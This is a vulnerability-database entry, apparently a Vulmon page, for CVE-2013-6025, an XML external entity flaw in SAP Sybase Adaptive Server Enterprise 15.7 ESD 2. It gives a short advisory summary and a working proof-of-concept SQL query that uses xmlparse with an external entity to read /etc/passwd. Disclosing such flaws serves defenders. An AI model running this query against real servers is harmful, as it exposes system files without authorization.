Recent Vulnerabilities Research Posts Trends Blog About Contact

Related Vulnerabilities: CVE-2013-6025

Publish Date: 25 Nov 2015

                source: http://www.securityfocus.com/bid/63193/info

SAP Sybase Adaptive Server Enterprise is prone to an information-disclosure vulnerability.

An attacker can exploit this issue to gain access to sensitive information; this may lead to further attacks.

SAP Sybase Adaptive Server Enterprise 15.7 ESD 2 is vulnerable; other versions may also be affected. 

SELECT xmlextract('/', xmlparse('&lt;?xml version="1.0" standalone="yes"?&gt;&lt;!DOCTYPE content [ &lt;!ENTITY abc SYSTEM "/etc/passwd"&gt;]&gt;&lt;content&gt;&amp;abc;&lt;/content&gt;'))

Vulmon Search is a vulnerability search engine. It gives comprehensive vulnerability information through a very simple user interface.

Home Recent Vulnerabilities Research Posts Trends Blog About Contact

Vulmon Search Vulmon Research Vulmon Alerts Vulmap

Twitter Reddit Linkedin Facebook

SAP Sybase Adaptive Server Enterprise - XML External Entity Information Disclosure

Vulmon Search

About

Products

Connect